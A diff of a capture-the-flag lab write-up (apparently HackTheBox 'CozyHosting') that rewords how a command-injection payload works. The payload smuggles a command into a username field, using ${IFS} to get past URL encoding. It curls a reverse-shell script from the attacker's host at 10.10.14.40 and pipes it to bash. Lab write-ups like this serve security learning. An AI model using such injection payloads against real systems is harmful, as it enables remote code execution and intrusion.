plsuwu/plsuwu/src/docs/writeups/cozyhosting.md

 The solution I used here was to write a reverse shell script to a file and serve it over a python `http.server`.
 We can then `curl` its contents from the CMS, and finally pipe to bash to execute it.

-This was slightly trickier than simply writing this as a URL-safe sequence, as character encoding like `%20` or `+` broke our commands upon reaching the shell, but we can use the  shell variable`${IFS}` to determine input field separation, which yields our desired word separator here.
+This task was slightly more challenging than writing this as a URL-safe sequence because character encodings such as %20 or + disrupted our commands upon reaching the shell.
+However, we can use the shell variable `${IFS}`, which will evaluate out to the tab, space, and newline characters, allowing us to effectively indicate the border of each command or argument.

 ```bash
 host=n&username=%3bcurl${IFS}<http://10.10.14.40:9990/hello.sh|/bin/bash%3b${IFS}>